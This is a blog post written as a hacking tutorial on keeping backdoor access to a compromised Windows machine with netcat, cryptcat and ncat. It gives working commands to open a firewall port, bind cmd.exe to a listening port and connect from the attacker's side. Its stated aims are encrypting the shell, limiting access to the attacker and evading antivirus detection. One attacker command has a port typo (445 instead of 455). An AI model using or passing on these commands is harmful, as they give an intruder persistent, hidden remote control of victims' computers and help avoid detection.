Thursday, October 24, 2013

Backdoor using Netcat, cryptcat , ncat.

Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P : 192.168.56.1

Victim`s I.P.     : 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start  netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection  possible by AV.

netcat-virustotal


(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.

netcat-capture-traffic-using-wireshark

(3)No authentication:- anyone can start listner to connect back to our backdoor , because there is no mechanism to verify that user are authorized or not.


(B)Cryptcat:-


Cryptcat is same as netcat but in advanced it provide encryption & authentication mechanism.

How to install cryptcat?


In case of backtrack , apt-get install cryptcat .

If you are in other linux OS , then you have to manually installed it from source ; because in repository it does not come with e option , so we can not bind any program to it.

So download source from here .

unzip it , change directory & enter following command

make unix

To make exe(windows compatible) from source , use visual studio.

root@bt:~# cryptcat -h
[v1.10]
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:            nc -l -p port [-options] [hostname] [port]
options:
    -e prog            program to exec after connect [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h                     this cruft
    -k secret          set the shared secret
    -i secs              delay interval for lines sent, ports scanned
    -l                      listen mode, for inbound connects
    -n                     numeric-only IP addresses, no DNS
    -o file               hex dump of traffic
    -p port             local port number
    -r                     randomize local and remote ports
    -s addr             local source address
    -u                     UDP mode
    -v                     verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z                     zero-I/O mode [used for scanning]

Most of options are same as netcat, but look at new option as -k , it provide password for communication.

On victim machine type following command

cryptcat -Ldp 455 -e cmd.exe

On attacker side , setup listner

cryptcat 192.168.56.101 455

backdoor-using-cryptcat

Look at following figure ; where we capture traffic using wireshark ; it`s encrypted.

cryptcat-capture-traffic

You can also provide -k option for authentication.So in case of cryptcat we got authentication & encryption.

But still it detected by AV.

cryptcat virustotal
                                            Virustotal link

(3)Ncat:-


Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat.Ncat  come with nmap , so in attacker side we have already installed ncat. 

To download ncat for windwos click here.

View man page of ncat or ncat --help ; it has so many option.

For encryption & authentication you can use ssl ,ssl cert, ssl key ,ssl verify.

on victim side:-

ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1

I encrypt communication using ssl & only allow 192.168.56.1 ip to connect back.It`s possible to connect back using spoofing I.P.

on attacker side

ncat 192.168.56.101 445 --ssl

ncat-backdoor

And it does not detected by AV.


cryptcat virustotal


So with help of ncat , we can get around of our problems which are no-authentication, no-encryption, caught by AV.

No comments:

Post a Comment